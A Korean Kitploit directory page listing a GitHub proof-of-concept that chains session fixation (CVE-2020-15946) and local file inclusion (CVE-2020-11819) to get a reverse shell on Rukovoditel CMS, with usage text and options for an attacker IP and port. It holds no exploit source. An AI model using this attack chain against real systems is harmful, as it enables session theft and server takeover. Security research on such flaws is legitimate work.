Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
PoC-RCE-Rukovoditel — CVE-2020-11819 및 CVE-2020-15946에 대한 개념 증명 | Kitploit
도구/GitHubGitHub/danyx07/poc-rce-rukovoditel
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubdanyx07/poc-rce-rukovoditel

PoC-RCE-Rukovoditel

CVE-2020-11819 및 CVE-2020-15946에 대한 개념 증명

저장소 보기
5년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

PoC-RCE-Rukovoditel

CVE-2020-11819 및 CVE-2020-15946에 대한 개념 증명. Rukovoditel 2.4.x, 2.5.x 및 2.6.1에서 테스트됨.

설명:

이 익스플로잇에는 두 가지 실행 모드가 있습니다: 세션 고정 취약점(CVE-2020-15946)을 사용하거나, 모든 프로필 아래의 모든 계정의 접근 자격 증명을 사용하는 것입니다. --type L 옵션을 사용하면 이 스크립트는 악성 링크를 생성합니다. 피해자가 브라우저에서 링크에 접근하면, 임의의 세션 식별자가 설정되어 피해자의 세션을 훔치는 데 사용됩니다. 이후 피해자의 프로필 사진에 PHP 콘텐츠가 포함된 이미지를 업로드한 후, 로컬 파일 포함(CVE-2020-11819)을 사용하여 멋진 리버스 셸을 얻거나, --type C -u -p 옵션을 사용하여 자격 증명을 제공하고, PHP 콘텐츠가 포함된 이미지를 로드한 후 로컬 파일 포함(CVE-2020-11819)을 사용하여 코드 실행을 달성할 수 있습니다.

팁: 등록 모듈이 활성화되어 있는지 확인하는 것을 잊지 마세요 ;)

사용법

exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]

Rukovoditel에 대한 인증 후 RCE, 스크립트 버전 1.0

선택 인수:
-h, --help 이 도움말 메시지를 표시하고 종료합니다
-t URL, --target URL CMS Rukovoditel의 URL/전체 경로 http://url/path/to/cms/
-u USER, --user USER 인증을 위한 사용자 이름
-p PASSWORD, --password PASSWORD 인증을 위한 비밀번호
-a TYPE, --type TYPE -a L을 사용하여 링크를 생성하고 세션을 훔치거나, 웹 애플리케이션에 접근 자격 증명이 있는 경우 -a C를 사용하십시오
--ip IP_ATTACKER 리버스 셸을 위한 공격자 IP!
--port PORT_ATTACKER 리버스 셸 연결을 위한 포트
--proxy PROXY 디버깅을 위한 http 프록시 설정 http://127.0.0.1:8080

도구 다운로드